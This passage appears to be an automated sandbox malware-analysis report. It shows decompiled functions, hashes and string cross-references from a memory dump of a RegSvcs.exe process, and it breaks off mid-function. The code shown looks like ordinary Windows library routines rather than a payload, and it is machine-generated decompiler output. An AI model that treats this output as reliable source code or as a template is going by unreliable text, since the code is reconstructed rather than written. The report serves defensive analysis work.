0x018ff1fb
0x018ff1fb
0x018ff1f4
0x018ff191
0x018ff173
0x018ff152
0x018ff203

Strings

@, xrefs: 018FF124

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 305e6002c484a7cfe09fe4b9cb480e64971b2ab603b6051867acdc27820d81bf
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 8F515A72504B159FC321DF19C840A6BBBE8FF88714F00892DFA99D7690E7B4E954CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01943540 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01943540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x19bd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01900BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01943706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0190FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01943540;
						E0190FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0191DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01950C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E019097C0();
					}
					return E0190B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01943971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01943884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0190FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01909650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01943787(_a4,  &_v352, _t80);
						}
					}
					L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E019095D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01943552
0x0194355a
0x0194355d
0x01943566
0x01943567
0x0194357e
0x0194358f
0x019435a1
0x019435a5
0x0194366b
0x0194366b
0x0194366d
0x01943672
0x01943679
0x01943685
0x0194368d
0x0194369d
0x019436a7
0x019436b8
0x019436c6
0x019436c7
0x019436dc
0x019436e1
0x019436e7
0x019436e9
0x019436e9
0x01943703
0x01943703
0x019435b5
0x019435c0
0x019435c4
0x00000000
0x00000000
0x019435ca
0x019435d7
0x019435e2
0x019435e6
0x019435e8
0x019435f5
0x019435fa
0x01943603
0x01943604
0x01943609
0x0194360a
0x01943612
0x01943613
0x0194361e
0x01943622
0x01943628
0x0194362f
0x0194362f
0x01943636
0x01943638
0x0194363b
0x01943642
0x01943642
0x01943636
0x01943657
0x01943657
0x0194365c
0x01943662
0x01943669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0194358F

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 1aa2f26b6c1645883f65a532bc5618f2e4df5b77e4024a87b984abc4b05d13e8
Instruction ID: 7ef956cad393679b9498634998aec8d50b1ac22152f96710eb62bedd765f57c4
Opcode Fuzzy Hash: 1aa2f26b6c1645883f65a532bc5618f2e4df5b77e4024a87b984abc4b05d13e8
Instruction Fuzzy Hash: 484103B1D0152D9FDB21DA60CC85F9EB77CAB54714F0045A5EA0DAB281DB309F888F95

Uniqueness

Uniqueness Score: -1.00%

Function 019905AC Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E019905AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E019907DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01909730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0198A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0198A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01991293(_t79, _v40, E019907DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E018E7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0198138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x019905c5
0x019905ca
0x019905d3
0x019906db
0x019906db
0x019906dd
0x019906e3
0x019906e3
0x019905dd
0x019905e7
0x019905f6
0x01990600
0x01990607
0x01990610
0x01990615
0x0199061a
0x0199061c
0x0199061e
0x01990624
0x01990625
0x01990627
0x01990628
0x01990631
0x01990640
0x0199064d
0x01990654
0x01990654
0x01990631
0x0199066d
0x01990674
0x00000000
0x00000000
0x01990692
0x0199069e
0x019906b0
0x019906a0
0x019906a9
0x019906a9
0x019906b8
0x019906d6
0x019906d6
0x00000000

Strings

`, xrefs: 01990633

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: b60bbbe41dd454a2de2bdb4dc10f8136fd5f7725d5287e60d9dd753337395745
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: CC31A2326043466BEB10DE29CD45F9A7BDDBBC4754F184629FA68DB280D770E904CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 01943884 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01943884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01909650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L018E4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01909650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01943893
0x01943896
0x01943899
0x0194389f
0x019438a0
0x019438a4
0x019438a9
0x019438ac
0x019438ad
0x019438ae
0x019438af
0x019438b1
0x019438b4
0x019438bb
0x019438bc
0x019438bd
0x019438c4
0x019438c8
0x019438ca
0x019438ca
0x019438d5
0x0194393e
0x01943940
0x01943942
0x01943952
0x01943954
0x01943961
0x01943961
0x01943967
0x0194396e
0x0194396e
0x01943947
0x0194394c
0x00000000
0x0194394c
0x019438ea
0x019438ee
0x019438f8
0x019438f9
0x019438ff
0x01943900
0x01943902
0x01943903
0x0194390b
0x0194390f
0x01943950
0x00000000
0x01943950
0x01943915
0x0194391d
0x0194391d
0x01943922
0x01943926
0x00000000
0x01943928
0x0194392b
0x0194392b
0x01943935
0x01943937
0x01943937
0x00000000
0x01943935
0x01943926
0x019438f0
0x00000000

Strings

BinaryName, xrefs: 019438B4

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 257d9b204fded5f3c447fca6b3c65149d719ad10d405950a45a585f7f55d36b7
Instruction ID: df57c453662769dafa2aa826223fc55cffd38c161a339134eae916756f38be84
Opcode Fuzzy Hash: 257d9b204fded5f3c447fca6b3c65149d719ad10d405950a45a585f7f55d36b7
Instruction Fuzzy Hash: C031E53690052AFFEB1ADA6CC945D6BFB78FB80720F014169E91DA7291D7309F00C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 018FD294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E018FD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x19bd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E018E4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0190B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E019098D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E019095D0();
					L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x018fd29c
0x018fd2a6
0x018fd2b1
0x018fd2b5
0x018fd2b6
0x018fd2bc
0x018fd2bd
0x018fd2be
0x018fd2bf
0x018fd2c2
0x018fd2c4
0x018fd2cc
0x018fd384
0x018fd34b
0x018fd34f
0x018fd350
0x018fd351
0x018fd35c
0x018fd35c
0x018fd2d6
0x018fd2da
0x018fd2e1
0x018fd361
0x018fd369
0x018fd36d
0x018fd2e3
0x018fd2e3
0x018fd2e3
0x018fd2e5
0x018fd2ed
0x018fd2f5
0x018fd2fa
0x018fd302
0x018fd303
0x018fd30b
0x018fd30f
0x018fd313
0x018fd318
0x018fd31c
0x018fd320
0x018fd379
0x018fd37d
0x00000000
0x00000000
0x0193affe
0x0193b001
0x0193b011
0x00000000
0x018fd322
0x018fd322
0x018fd330
0x018fd337
0x018fd35d
0x018fd339
0x018fd33f
0x018fd38c
0x018fd38c
0x018fd33f
0x018fd349
0x00000000
0x018fd349

Strings

@, xrefs: 018FD303

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: d56fa3b75f67658fca86c7163c6df3017f26acd2e9166a51b855a96663fd065e
Instruction ID: f94435434e76e609b5706aeff15d9dc42816a26d7bd24a5e33cf6865928937ad
Opcode Fuzzy Hash: d56fa3b75f67658fca86c7163c6df3017f26acd2e9166a51b855a96663fd065e
Instruction Fuzzy Hash: 983170B65493059FC711DF68C98095BBBE8EB95758F000A2EFB99C3251E634DE04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 018D1B8F Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E018D1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0190BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0190A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0190A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L018E4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x018d1b8f
0x018d1b9a
0x018d1b9c
0x018d1b9e
0x018d1ba3
0x01927010
0x01927010
0x00000000
0x018d1ba9
0x018d1ba9
0x018d1bae
0x00000000
0x018d1bc5
0x018d1bca
0x018d1bcf
0x018d1bd0
0x018d1bd1
0x018d1bd2
0x018d1bd6
0x018d1bdc
0x018d1be0
0x01926ffc
0x01927000
0x00000000
0x01927006
0x01927009
0x01927009
0x018d1be6
0x018d1bec
0x018d1c0b
0x018d1c0b
0x018d1c0c
0x018d1c11
0x018d1c12
0x018d1c15
0x018d1c1b
0x018d1c1f
0x018d1c31
0x018d1c33
0x01927026
0x01927026
0x018d1c21
0x018d1c24
0x018d1c24
0x018d1bee
0x018d1bee
0x018d1bf2
0x018d1c3a
0x018d1bf4
0x018d1bf4
0x018d1c05
0x018d1c05
0x018d1c09
0x018d1c3e
0x00000000
0x00000000
0x00000000
0x018d1c09
0x018d1bec
0x018d1be0
0x018d1bae
0x018d1c2e

Strings

WindowsExcludedProcs, xrefs: 018D1BC5

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: e19557faa9a8f8f19e30fd6aa483b19c5f03f52a3e146c02366cba848ef88885
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: 24210A7A640329ABDB229A9DC848F5F7BADEF91B51F054425FE08DB204D634DE00D7E0

Uniqueness

Uniqueness Score: -1.00%

Function 018EF716 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E018EF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x018ef71d
0x018ef722
0x018ef726
0x01934770
0x018ef765
0x018ef769
0x018ef769
0x018ef732
0x0193477a
0x00000000
0x0193477a
0x018ef738
0x018ef73a
0x018ef73c
0x018ef73f
0x018ef746
0x018ef778
0x018ef7a9
0x018ef7a9
0x018ef754
0x018ef75a
0x018ef75d
0x018ef75f
0x018ef761
0x018ef76f
0x018ef771
0x018ef771
0x018ef76f
0x018ef763
0x00000000
0x018ef763
0x018ef77d
0x018ef7a3
0x018ef7a5
0x00000000
0x018ef7a5
0x018ef77f
0x018ef782
0x018ef784
0x018ef786
0x00000000
0x00000000
0x00000000
0x018ef788
0x018ef748
0x018ef74d
0x018ef78d
0x018ef793
0x018ef7b7
0x018ef7bc
0x00000000
0x018ef7bc
0x018ef798
0x00000000
0x00000000
0x018ef79d
0x018ef7b0
0x00000000
0x018ef7b0
0x018ef79f
0x00000000
0x018ef74f
0x018ef74f
0x00000000
0x018ef74f

Strings

Actx , xrefs: 018EF73F

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 2fb4f0017763165b0026cd28c2ff3e5059e541107da732977c130c8c5e29471b
Instruction ID: 53a2430298106b5796905107d8b8ba0912040d1cb4d9cdc288f8b3bf80332401
Opcode Fuzzy Hash: 2fb4f0017763165b0026cd28c2ff3e5059e541107da732977c130c8c5e29471b
Instruction Fuzzy Hash: B211B6353846C68BF7254E1D8C9873676D6EB87728F26452AEB76CB391D770CA40C340

Uniqueness

Uniqueness Score: -1.00%

Function 01978DF1 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01978DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x19a0d50);
				E0191D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01955720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = E0191DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				E0191DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0191D130(_t34, _t39, _t40);
			}

0x01978df1
0x01978df1
0x01978df1
0x01978df1
0x01978df1
0x01978df1
0x01978df3
0x01978df8
0x01978dfd
0x01978e00
0x01978e0e
0x01978e2a
0x01978e36
0x01978e38
0x01978e3c
0x01978e46
0x01978e46
0x01978e36
0x01978e50
0x01978e56
0x01978e59
0x01978e5c
0x01978e60
0x01978e67
0x01978e6d
0x01978e73
0x01978e74
0x01978eb1
0x01978ebd

Strings

Critical error detected %lx, xrefs: 01978E21

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 4ec23a8bf6429726cfe27a879cd938f4c04ce75c9eb772648250b9bec2997438
Instruction ID: 20512447ae8ab8c34b96260082250e99991bf60801f9fc1ca839023b25e352df
Opcode Fuzzy Hash: 4ec23a8bf6429726cfe27a879cd938f4c04ce75c9eb772648250b9bec2997438
Instruction Fuzzy Hash: 6F113971D15348EAEB29DFA88509B9CBBF4BF54315F24465DE52DAB282C3342602CF14

Uniqueness

Uniqueness Score: -1.00%

Function 01995BA5 Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E01995BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x19a1178);
				E0191D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
